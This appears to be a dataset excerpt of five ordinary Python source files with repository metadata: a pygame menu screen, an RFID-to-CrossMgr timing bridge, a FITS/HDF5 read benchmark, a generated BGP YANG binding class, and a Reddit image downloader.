| hexsha (stringlengths 40..40) | size (int64 3..1.03M) | ext (stringclasses 10 values) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 3..972) | max_stars_repo_name (stringlengths 6..130) | max_stars_repo_head_hexsha (stringlengths 40..78) | max_stars_repo_licenses (listlengths 1..10) | max_stars_count (int64 1..191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24..24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24..24 ⌀) | max_issues_repo_path (stringlengths 3..972) | max_issues_repo_name (stringlengths 6..130) | max_issues_repo_head_hexsha (stringlengths 40..78) | max_issues_repo_licenses (listlengths 1..10) | max_issues_count (int64 1..116k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24..24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24..24 ⌀) | max_forks_repo_path (stringlengths 3..972) | max_forks_repo_name (stringlengths 6..130) | max_forks_repo_head_hexsha (stringlengths 40..78) | max_forks_repo_licenses (listlengths 1..10) | max_forks_count (int64 1..105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24..24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24..24 ⌀) | content (stringlengths 3..1.03M) | avg_line_length (float64 1.13..941k) | max_line_length (int64 2..941k) | alphanum_fraction (float64 0..1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 22d131f503c48f738b5b4902e60813623504e67a | 1,940 | py | Python | Menus/Main/LevelSelectionEdit/DeleteLevel.py | PyRectangle/GreyRectangle | 21c19002f52563a096566e9166040815005b830b | ["MIT"] | 3 | 2017-09-28T16:53:09.000Z | 2018-03-18T20:01:41.000Z | Menus/Main/LevelSelectionEdit/DeleteLevel.py | PyRectangle/GreyRectangle | 21c19002f52563a096566e9166040815005b830b | ["MIT"] | null | null | null | Menus/Main/LevelSelectionEdit/DeleteLevel.py | PyRectangle/GreyRectangle | 21c19002f52563a096566e9166040815005b830b | ["MIT"] | null | null | null |
from Frame.gui.Button import Button
from pygameImporter import pygame
from Frame.Render import Render
from Constants import *
from Menu import Menu
class DeleteLevel(Menu):
def __init__(self, menuHandler):
super().__init__()
self.level = None
self.alpha = 0
self.up = True
self.do = False
self.window = menuHandler.window
self.renderObj = Render(menuHandler.window)
self.addGui(Button, (menuHandler.edit, (), 40, 900, 400, 100, "Cancel", (100, 100, 100), (0, 0, 0), (100, 100, 255), (0, 0, 0), FONT, True, 30, 30, 0.1, True,
[0, -1], None, SOUNDS, menuHandler.window))
self.addGui(Button, (menuHandler.deleteLevel, (), 1000, 900, 400, 100, "Delete", (100, 100, 100), (0, 0, 0), (100, 100, 255), (0, 0, 0), FONT, True, 30, 30, 0.1,
True, [0, -1], None, SOUNDS, menuHandler.window))
def update(self):
super().update()
if self.do:
if self.up:
self.alpha += self.window.dt
if self.alpha > 255:
self.alpha = 255
self.do = False
else:
self.alpha -= self.window.dt
if self.alpha < 1:
self.do = False
self.alpha = 1
def render(self):
super().render()
text = "Do you really want to delete \"" + self.level.name + "\" ?"
self.renderObj.text(FONT, self.renderObj.getTextSizeForWidth(text, 100, SURFACE_SIZE[0], FONT), text, True, (0, 0, 0), None, self.window.surface, addY = -55,
alpha = self.alpha)
self.renderObj.text(FONT, 100, "It will be lost forever !", True, (0, 0, 0), None, self.window.surface, addY = 55, alpha = self.alpha)
self.renderObj.text(FONT, 100, "Delete", True, (0, 0, 0), None, self.window.surface, addY = -400, alpha = self.alpha)
| 45.116279 | 169 | 0.54433 |
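The DeleteLevel.update() method above drives a fade by accumulating the frame delta-time into self.alpha and clamping it to the 1..255 range. A minimal, framework-free sketch of that pattern (the Fader class and its field names are illustrative, not part of the PyRectangle repo):

```python
# Hedged sketch of the dt-driven fade used by DeleteLevel.update() above:
# alpha accumulates the frame delta-time and is clamped to [1, 255].
class Fader:
    def __init__(self):
        self.alpha = 0      # current opacity, 0..255
        self.up = True      # True = fading in, False = fading out
        self.do = False     # True while an animation is running

    def start(self, fade_in):
        self.up = fade_in
        self.do = True

    def update(self, dt):
        if not self.do:
            return
        if self.up:
            self.alpha += dt
            if self.alpha > 255:
                self.alpha = 255
                self.do = False
        else:
            self.alpha -= dt
            if self.alpha < 1:
                self.alpha = 1
                self.do = False


fader = Fader()
fader.start(fade_in=True)
for _ in range(10):
    fader.update(dt=40)     # pretend each frame contributes 40 "alpha units"
print(fader.alpha)          # 255 once the fade-in has finished
```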
| e3c6f66ac9d8485c9fef648d232e2b315f862e9d | 6,957 | py | Python | CrossMgrImpinj/Impinj2JChip.py | esitarski/CrossMgr | de33b5ed662556ec659e6e2910f5fd0f88f25fa0 | ["MIT"] | 25 | 2015-02-26T01:26:10.000Z | 2022-03-25T15:46:55.000Z | CrossMgrImpinj/Impinj2JChip.py | esitarski/CrossMgr | de33b5ed662556ec659e6e2910f5fd0f88f25fa0 | ["MIT"] | 76 | 2015-12-09T04:24:30.000Z | 2022-02-18T16:39:28.000Z | CrossMgrImpinj/Impinj2JChip.py | esitarski/CrossMgr | de33b5ed662556ec659e6e2910f5fd0f88f25fa0 | ["MIT"] | 17 | 2015-04-23T07:37:13.000Z | 2020-01-22T17:47:16.000Z |
import re
import os
import socket
import time
import threading
import datetime
from six.moves.queue import Empty
#------------------------------------------------------------------------------
# JChip delimiter (CR, **not** LF)
CR = u'\r'
#------------------------------------------------------------------------------
# Function to format number, lap and time in JChip format
# Z413A35 10:11:16.4433 10 10000 C7
count = 0
def formatMessage( tagID, t ):
global count
message = u"DA{} {} 10 {:05X} C7 date={}{}".format(
tagID, # Tag code in decimal, no leading zeros.
t.strftime('%H:%M:%S.%f'), # hh:mm:ss.ff
count, # Data index number in hex.
t.strftime('%Y%m%d'), # YYYYMMDD
CR
)
count += 1
return message
class Impinj2JChip:
def __init__( self, dataQ, messageQ, shutdownQ, crossMgrHost, crossMgrPort ):
''' Queues:
dataQ: tag/timestamp data to be written out to CrossMgr.
messageQ: queue to write status messages.
shutdownQ: queue to receive shutdown message to stop gracefully.
'''
self.dataQ = dataQ
self.messageQ = messageQ
self.shutdownQ = shutdownQ
self.crossMgrHost = crossMgrHost
self.crossMgrPort = crossMgrPort
self.keepGoing = True
self.tagCount = 0
def shutdown( self ):
self.keepGoing = False
def checkKeepGoing( self ):
if not self.keepGoing:
return False
try:
d = self.shutdownQ.get( False )
self.keepGoing = False
return False
except Empty:
return True
def getCmd( self, sock ):
received = ''
while self.keepGoing and received[-1:] != CR:
try:
received += sock.recv(4096).decode() # doing a decode() here only works if there are no multi-byte utf characters (which is true for JChip protocol).
except socket.timeout:
return received, True
return received[:-1], False
def runServer( self ):
instance_name = u'{}-{}'.format(socket.gethostname(), os.getpid())
while self.checkKeepGoing():
self.messageQ.put( ('Impinj2JChip', 'state', False) )
self.messageQ.put( ('Impinj2JChip', u'Trying to connect to CrossMgr at {}:{} as "{}"...'.format(self.crossMgrHost, self.crossMgrPort, instance_name)) )
sock = None
#------------------------------------------------------------------------------
# Connect to the CrossMgr server.
#
self.tagCount = 0
while self.checkKeepGoing():
try:
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
sock.connect((self.crossMgrHost, self.crossMgrPort))
break
except socket.error:
sock = None
self.messageQ.put( ('Impinj2JChip', u'CrossMgr Connection Failed. Trying again at {}:{} as "{}" in 2 sec...'.format(self.crossMgrHost, self.crossMgrPort, instance_name)) )
for t in range(2):
time.sleep( 1 )
if not self.checkKeepGoing():
break
if not self.checkKeepGoing():
break
# Set the timeout with CrossMgr to 2 seconds. If CrossMgr fails to respond within this time, re-establish the connection.
sock.settimeout( 2.0 )
#------------------------------------------------------------------------------
# Send client identity.
#
self.messageQ.put( ('Impinj2JChip', u'state', True) )
self.messageQ.put( ('Impinj2JChip', u'******************************' ) )
self.messageQ.put( ('Impinj2JChip', u'CrossMgr Connection succeeded!' ) )
self.messageQ.put( ('Impinj2JChip', u'Sending identifier "{}"...'.format(instance_name)) )
try:
sock.send(u"N0000{}{}".format(instance_name, CR).encode())
except socket.timeout:
self.messageQ.put( ('Impinj2JChip', 'CrossMgr connection timed out [1].') )
sock.close()
sock = None
continue
#------------------------------------------------------------------------------
self.messageQ.put( ('Impinj2JChip', 'Waiting for GT (get time) command from CrossMgr...') )
received, timedOut = self.getCmd( sock )
if not self.checkKeepGoing():
break
if timedOut:
self.messageQ.put( ('Impinj2JChip', u'CrossMgr connection timed out [2].') )
sock.close()
sock = None
continue
self.messageQ.put( ('Impinj2JChip', u'Received: "{}" from CrossMgr'.format(received)) )
if received != 'GT':
self.messageQ.put( ('Impinj2JChip', u'Incorrect command (expected GT).') )
sock.close()
sock = None
continue
# Send 'GT' (GetTime response to CrossMgr).
self.messageQ.put( ('Impinj2JChip', u'Sending GT (get time) response...') )
# format is GT0HHMMSShh<CR> where hh is 100's of a second. The '0' (zero) after GT is the number of days running, ignored by CrossMgr.
dBase = datetime.datetime.now()
message = u'GT0{} date={}{}'.format(
dBase.strftime('%H%M%S%f'),
dBase.strftime('%Y%m%d'),
CR)
self.messageQ.put( ('Impinj2JChip', message[:-1]) )
try:
sock.send( message.encode() )
except socket.timeout:
self.messageQ.put( ('Impinj2JChip', u'CrossMgr connection timed out [3].') )
sock.close()
sock = None
continue
#------------------------------------------------------------------------------
if not self.checkKeepGoing():
break
self.messageQ.put( ('Impinj2JChip', u'Waiting for S0000 (send) command from CrossMgr...') )
received, timedOut = self.getCmd( sock )
if not self.checkKeepGoing():
break
if timedOut:
self.messageQ.put( ('Impinj2JChip', u'CrossMgr connection timed out [4].') )
sock.close()
sock = None
continue
self.messageQ.put( ('Impinj2JChip', u'Received: "{}" from CrossMgr'.format(received)) )
if not received.startswith('S'):
self.messageQ.put( ('Impinj2JChip', u'Incorrect command (expected S0000).') )
sock.close()
sock = None
continue
#------------------------------------------------------------------------------
# Enter "Send" mode - keep sending data until we get a shutdown.
# If the connection fails, return to the outer loop.
#
self.messageQ.put( ('Impinj2JChip', u'Start sending data to CrossMgr...') )
self.messageQ.put( ('Impinj2JChip', u'Waiting for RFID reader data...') )
while self.checkKeepGoing():
# Get all the entries from the receiver and forward them to CrossMgr.
d = self.dataQ.get()
if d == 'shutdown':
self.keepGoing = False
break
# Expect message if the form [tag, time].
message = formatMessage( d[0], d[1] )
try:
sock.send( message.encode() )
self.tagCount += 1
self.messageQ.put( ('Impinj2JChip', u'Forwarded {}: {}'.format(self.tagCount, message[:-1])) )
except Exception:
self.dataQ.put( d ) # Put the data back on the queue for resend.
self.messageQ.put( ('Impinj2JChip', u'Lost CrossMgr Connection. Attempting to reconnect...') )
break
sock.close()
sock = None
def CrossMgrServer( dataQ, messageQ, shutdownQ, crossMgrHost, crossMgrPort ):
impinj2JChip = Impinj2JChip( dataQ, messageQ, shutdownQ, crossMgrHost, crossMgrPort )
impinj2JChip.runServer()
| 35.314721 | 177 | 0.600834 |
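formatMessage() above serializes a tag read into a JChip "DA" record: tag id, hh:mm:ss.ffffff timestamp, a hex data index, "C7", a date= field, and a CR terminator. A small standalone sketch of the same record layout (the helper name and sample values are made up for illustration):

```python
# Illustrative sketch, not part of the CrossMgr repo: build a JChip-style "DA"
# record the way formatMessage() above does.
import datetime

CR = '\r'

def format_da_record(tag_id, t, index):
    return "DA{} {} 10 {:05X} C7 date={}{}".format(
        tag_id, t.strftime('%H:%M:%S.%f'), index, t.strftime('%Y%m%d'), CR)

now = datetime.datetime(2022, 3, 25, 10, 11, 16, 443300)
print(repr(format_da_record('413A35', now, 0)))
# 'DA413A35 10:11:16.443300 10 00000 C7 date=20220325\r'
```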
| 814e131b935e732720cb4b9db0ae24fb45d2598d | 3,672 | py | Python | aadnc_benchmarks/benchmark_read_speed.py | telegraphic/fits2hdf | a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01 | ["MIT"] | 22 | 2015-03-02T21:38:33.000Z | 2021-05-09T11:30:41.000Z | aadnc_benchmarks/benchmark_read_speed.py | telegraphic/fits2hdf | a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01 | ["MIT"] | 16 | 2015-03-01T23:11:49.000Z | 2019-08-08T03:18:30.000Z | aadnc_benchmarks/benchmark_read_speed.py | telegraphic/fits2hdf | a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01 | ["MIT"] | 11 | 2015-03-26T14:50:33.000Z | 2021-12-11T13:21:12.000Z |
"""
benchmark compression
---------------------
Generate benchmarks for AANDC paper.
"""
import numpy as np
from os.path import join,exists
from shutil import copy2
import os
from fits2hdf import idi
from fits2hdf.io import hdfio, fitsio
import time
import h5py
from astropy.io import fits as pf
def create_image(img_name, data, hdf_opts={}):
""" Create HDF and FITS versions of a given image """
output_dir_fits = 'fits_generated'
output_dir_hdf = 'hdf_generated'
idi_img = idi.IdiHdulist()
idi_img.add_image_hdu(img_name, data=data)
# Create all the filenames
fits_filename = join(output_dir_fits, img_name+'.fits')
hdf_filename = join(output_dir_hdf, img_name+'.h5')
hdf_comp_filename = join(output_dir_hdf, img_name+'_comp.h5')
gzip_comp_filename = join(output_dir_fits, img_name+'.fits.gz')
fits_comp_filename = join(output_dir_fits, img_name+'.fits.fz')
# Delete files that already exists
file_list = [fits_filename, hdf_filename, fits_comp_filename,
hdf_comp_filename, gzip_comp_filename]
for fname in file_list:
if exists(fname):
os.remove(fname)
print("\nWriting %s to disk" % img_name)
t1 = time.time()
fitsio.export_fits(idi_img, fits_filename)
t2 = time.time()
hdfio.export_hdf(idi_img, hdf_filename)
t3 = time.time()
hdfio.export_hdf(idi_img, hdf_comp_filename, **hdf_opts)
t4 = time.time()
def read_speed(img_name):
output_dir_fits = 'fits_generated'
output_dir_hdf = 'hdf_generated'
fits_filename = join(output_dir_fits, img_name+'.fits')
hdf_filename = join(output_dir_hdf, img_name+'.h5')
hdf_comp_filename = join(output_dir_hdf, img_name+'_comp.h5')
with pf.open(fits_filename) as a:
print("DATA SHAPE: {}".format(a[0].data.shape))
t1 = time.time()
for ii in range(a[0].data.shape[0]):
d = a[0].data[ii::4, ii::4, ...]
t2 = time.time()
print(("Time for FITS access: %2.2es" % (t2 - t1)))
#%%
with h5py.File(hdf_filename,'r',libver='latest') as b:
k = b["random_integers_23"]["DATA"]
t1 = time.time()
for ii in range(d.shape[0]):
d = k[ii::4, ii::4, ...]
t2 = time.time()
print(("Time for HDF access: %2.2es" % (t2 - t1)))
if __name__== "__main__":
# IMAGE DATA
hdf_opts = {
'compression': 'bitshuffle'
}
print("HDF5 compression options:")
for option, optval in hdf_opts.items():
print((" ", option, optval))
#file_info = create_image(img_name, img_data, hdf_opts=hdf_opts)
# Generate data with differing levels of entropy
print("Generating random integers")
max_int = 2**23
#img_data = np.random.random_integers(-1*max_int, max_int, size=(1000, 1000, 1000)).astype('int32')
#create_image(img_name, img_data, hdf_opts=hdf_opts)
# Open example datasets
print("Reading...")
for copy_num in range(1, 5):
fname = "random_integers_%i.fits" % np.log2(max_int)
fname2 = "random_integers_%i%i.fits" % (np.log2(max_int), copy_num)
print(("cp fits_generated/%s fits_generated/%s" % (fname, fname2)))
copy2(join('fits_generated',fname), join('fits_generated/',fname2))
fname = "random_integers_%i.h5" % np.log2(max_int)
fname2 = "random_integers_%i%i.h5" % (np.log2(max_int), copy_num)
print(("cp hdf_generated/%s hdf_generated/%s" % (fname, fname2)))
copy2(join('hdf_generated',fname), join('hdf_generated/',fname2))
for copy_num in range(1, 5):
img_name = "random_integers_%i%i" % (np.log2(max_int), copy_num)
read_speed(img_name)
| 31.384615 | 103 | 0.64951 |
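read_speed() above times strided slices of the form data[ii::4, ii::4, ...] against FITS and HDF5 files on disk. A self-contained, in-memory sketch of that access pattern using only numpy and time, so it runs without generating the benchmark files (array size and loop count are arbitrary):

```python
# Small timing sketch (numpy only, no FITS/HDF5 files needed) of the
# strided-slice access pattern that read_speed() above benchmarks on disk.
import time
import numpy as np

data = np.random.randint(-2**23, 2**23, size=(64, 256, 256)).astype('int32')

t1 = time.time()
for ii in range(4):
    d = data[ii::4, ii::4, ...]   # every 4th plane/row, offset by ii
t2 = time.time()
print("Time for in-memory strided access: %2.2es" % (t2 - t1))
```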
| 0079fa08a7707f5ec47be57cfb217679ee2a6b8b | 6,158 | py | Python | pybind/nos/v7_1_0/rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | ["Apache-2.0"] | null | null | null | pybind/nos/v7_1_0/rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | ["Apache-2.0"] | null | null | null | pybind/nos/v7_1_0/rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | ["Apache-2.0"] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import as4
class af_neighbor_capability(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-rbridge - based on the path /rbridge-id/router/router-bgp/router-bgp-attributes/neighbor/neighbor-ipv6s/neighbor-ipv6-addr/af-neighbor-capability. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__as4',)
_yang_name = 'af-neighbor-capability'
_rest_name = 'capability'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__as4 = YANGDynClass(base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'rbridge-id', u'router', u'router-bgp', u'router-bgp-attributes', u'neighbor', u'neighbor-ipv6s', u'neighbor-ipv6-addr', u'af-neighbor-capability']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'rbridge-id', u'router', u'bgp', u'neighbor', u'neighbor-ipv6-addr', u'capability']
def _get_as4(self):
"""
Getter method for as4, mapped from YANG variable /rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/as4 (container)
"""
return self.__as4
def _set_as4(self, v, load=False):
"""
Setter method for as4, mapped from YANG variable /rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/as4 (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_as4 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_as4() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """as4 must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__as4 = t
if hasattr(self, '_set'):
self._set()
def _unset_as4(self):
self.__as4 = YANGDynClass(base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
as4 = __builtin__.property(_get_as4, _set_as4)
_pyangbind_elements = {'as4': as4, }
| 49.66129 | 472 | 0.714518 |
| 8faefcf16dad2d9986f2deef07951bb6489a9770 | 10,897 | py | Python | ruidl.py | calebglawson/ruidl | c255e4aff80f36a21ea6df4851544069e3ee54d7 | ["MIT"] | null | null | null | ruidl.py | calebglawson/ruidl | c255e4aff80f36a21ea6df4851544069e3ee54d7 | ["MIT"] | 1 | 2021-08-07T12:26:00.000Z | 2021-08-07T12:26:00.000Z | ruidl.py | calebglawson/ruidl | c255e4aff80f36a21ea6df4851544069e3ee54d7 | ["MIT"] | null | null | null |
'''
This file contains the necessary components to download images from a subbreddit or redditor.
'''
from abc import abstractmethod
import os
import re
import json
import hashlib
import sys
import time
import traceback
from glob import glob
from pathlib import Path
from multiprocessing import cpu_count
from multiprocessing.pool import ThreadPool
import exif
import requests
import praw
import prawcore
import typer
import wordninja
from bs4 import BeautifulSoup
APP = typer.Typer()
USER_AGENT_HEADER = {
'User-Agent': (
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'
)
}
def _make_config():
'''
Load the config from a file.
'''
config = open('./config.json')
return json.load(config)
def _make_api(config):
'''
Make a PRAW api object.
'''
api = praw.Reddit(
client_id=config.get('client_id'),
client_secret=config.get('client_secret'),
user_agent='script:com.example.ruidl:v1 (by u/anon)',
username=config.get('username'),
password=config.get('password')
)
return api
def _ninjify(url):
words = wordninja.split(url.split("/")[-1])
capitalized_words = ''
for idx, word in enumerate(words):
if idx < 3:
capitalized_words = f'{capitalized_words}{word[0].upper()}{word[1:]}'
else:
capitalized_words = f'{capitalized_words}{word}'
return capitalized_words
class Ruidl(object):
'''
Reddit media downloader.
'''
def __init__(self, name, download_directory, verbose):
self._name = name
self._verbose = verbose
self._type = getattr(self, '_type')
self._config = _make_config()
self._api = _make_api(self._config)
dl_dir = f'{download_directory}/' if download_directory else self._config.get(
"download_dir", "./"
)
self._base_path = f'{dl_dir}{self._type}{self._name.replace("_", "-")}'
if not os.path.exists(self._base_path):
os.makedirs(self._base_path)
self._filetypes = [
'.jpg',
'.png',
'.gif',
'.mp4',
'.webm'
]
self._invalid_filetypes = [
'.gifv'
]
existing_files = []
for file_type in self._filetypes:
existing_files.extend(glob(f'{self._base_path}/*{file_type}'))
self._filenames = {fn.split('_')[1] for fn in existing_files}
self._checksums = {
fn.split('_')[0].replace(f'{self._base_path}\\', '') for fn in existing_files
}
del existing_files
wordninja.DEFAULT_LANGUAGE_MODEL = wordninja.LanguageModel(
Path('./wordninja_words.txt.gz')
)
def _download_file(self, file_url, submission):
file_name = f'{self._base_path}/{file_url.split("/")[-1]}'
if file_name in self._filenames:
return
request = requests.get(file_url, headers=USER_AGENT_HEADER)
file_hash = hashlib.md5(request.content).hexdigest()
if file_hash in self._checksums:
return
self._checksums.add(file_hash)
self._filenames.add(file_name.split("/")[-1].split("?")[0])
new_file_name = f'{self._base_path}/{file_hash}_{file_name.split("/")[-1].split("?")[0]}'
if sys.getsizeof(request.content) < self._config.get('file_size_threshold', 10000):
return
with open(new_file_name, 'wb') as new:
new.write(request.content)
if any([file_type in file_name for file_type in ['mp4', 'gif', 'png', 'webm']]):
return
try:
with open(new_file_name, 'rb') as new:
image = exif.Image(new.read())
image.artist = str(submission.author)
image.image_description = str(submission.subreddit)
with open(new_file_name, 'wb') as new:
new.write(image.get_file())
except Exception as exception: # pylint: disable=broad-except
if self._verbose:
typer.echo(
f'Error writing Exif data: {new_file_name} {exception}'
)
def _get_file_urls(self, submission):
file_urls = []
if any([ext in submission.url for ext in self._filetypes]):
file_urls = [submission.url]
elif 'reddit.com/gallery' in submission.url:
request = requests.get(
submission.url,
headers=USER_AGENT_HEADER
)
soup = BeautifulSoup(request.content, features='html.parser')
file_urls = [
elem.get('href')
for elem in
soup.find_all(
'a',
href=re.compile('preview.redd.it'),
attrs={'target': '_blank'}
)
]
elif 'imgur.com/a/' in submission.url:
# Imgur gallery, multiple images.
gallery = submission.url.split("/")[-1]
request = requests.get(
f'https://imgur.com/ajaxalbums/getimages/{gallery}',
headers=USER_AGENT_HEADER
)
response = json.loads(request.content)
file_urls = [
f'https://i.imgur.com/{image["hash"]}{image["ext"]}'
for image in
response['data']['images']
# Exclude gifv
if image["ext"] not in self._invalid_filetypes
]
elif 'imgur.com/' in submission.url:
# Single imgur image.
image = submission.url.split("/")[-1]
file_urls = [f'https://i.imgur.com/{image}.jpg']
elif (
self._config.get('wordninja_trigger') and
self._config.get('wordninja_trigger') in submission.url
):
file_urls = [
(
f'{self._config.get("wordninja_download_url","")}'
f'{_ninjify(submission.url)}.mp4'
)
]
elif 'gfycat.com/' in submission.url:
file_urls = [
f'https://giant.gfycat.com/{_ninjify(submission.url)}.webm'
]
else:
if self._verbose:
typer.echo(
f'No match triggered for this URL: {submission.url} '
f'Permalink: https://reddit.com{submission.permalink}'
)
return file_urls
def _process_submission(self, submission):
try:
file_urls = self._get_file_urls(submission)
for file_url in file_urls:
self._download_file(file_url, submission)
except Exception as exception: # pylint: disable=broad-except
# Needed so that any exceptions in threads are loud and clear.
if self._verbose:
typer.echo(exception)
typer.echo(traceback.format_exc())
def _handle_submissions(self, submissions):
num_threads = cpu_count() if len(submissions) > cpu_count() else len(submissions)
if num_threads:
if any(character in self._name for character in ['-', '_']):
# We only place crumbs when they're needed.
Path(f'{self._base_path}/{self._name}.crumb').touch()
typer.echo(
f'Processing {len(submissions)} submissions with {num_threads} worker thread(s).'
)
thread_pool = ThreadPool(num_threads)
start_file_num = len(os.listdir(self._base_path))
start = time.time()
thread_pool.map_async(self._process_submission, submissions)
thread_pool.close()
thread_pool.join()
end = time.time()
end_file_num = len(os.listdir(self._base_path))
typer.echo(
f'Downloaded {end_file_num - start_file_num} '
f'files within {int(end - start)} seconds.'
)
else:
typer.echo('No submissions found, nothing to process.')
self._clean_empty_dir()
def _clean_empty_dir(self):
if len(os.listdir(self._base_path)) == 0:
os.rmdir(self._base_path)
@abstractmethod
def get(self, limit, search):
'''
Process the request to Reddit.
'''
raise NotImplementedError
class Redditor(Ruidl):
'''
A Redditor is a Reddit User.
'''
def __init__(self, name, download_directory, verbose):
self._type = 'redditor/'
super().__init__(name, download_directory, verbose)
def get(self, limit, search):
'''
Download content
'''
try:
redd = self._api.redditor(self._name)
typer.echo('Retrieving submission list.')
submissions = [
submission for submission in redd.submissions.new(limit=limit)
]
self._handle_submissions(submissions)
except prawcore.exceptions.NotFound:
typer.echo(f'Could not find redditor {self._name}.')
self._clean_empty_dir()
class Subreddit(Ruidl):
'''
A Subreddit is a community page on Reddit.
'''
def __init__(self, name, download_directory, verbose):
self._type = 'subreddit/'
super().__init__(name, download_directory, verbose)
def get(self, limit, search):
'''
Download content
'''
try:
sub = self._api.subreddit(self._name)
typer.echo('Retrieving submission list.')
submissions = [
submission for submission in
(
sub.search(
search,
sort='new',
limit=limit
) if search else sub.new(
limit=limit
)
)
]
self._handle_submissions(submissions)
except prawcore.exceptions.Redirect:
typer.echo(f'Could not find subreddit {self._name}.')
self._clean_empty_dir()
@APP.command()
def redditor(
name: str,
limit: int = typer.Option(None),
download_directory: str = typer.Option(None),
verbose: bool = typer.Option(False),
):
'''
Download from the specified user.
'''
Redditor(name, download_directory, verbose).get(limit, search=None)
@APP.command()
def subreddit(
name: str,
limit: int = typer.Option(None),
search: str = typer.Option(None),
download_directory: str = typer.Option(None),
verbose: bool = typer.Option(False),
):
'''
Download from the specified subreddit.
'''
Subreddit(name, download_directory, verbose).get(limit, search)
if __name__ == '__main__':
APP()
| 30.269444 | 97 | 0.559053 |
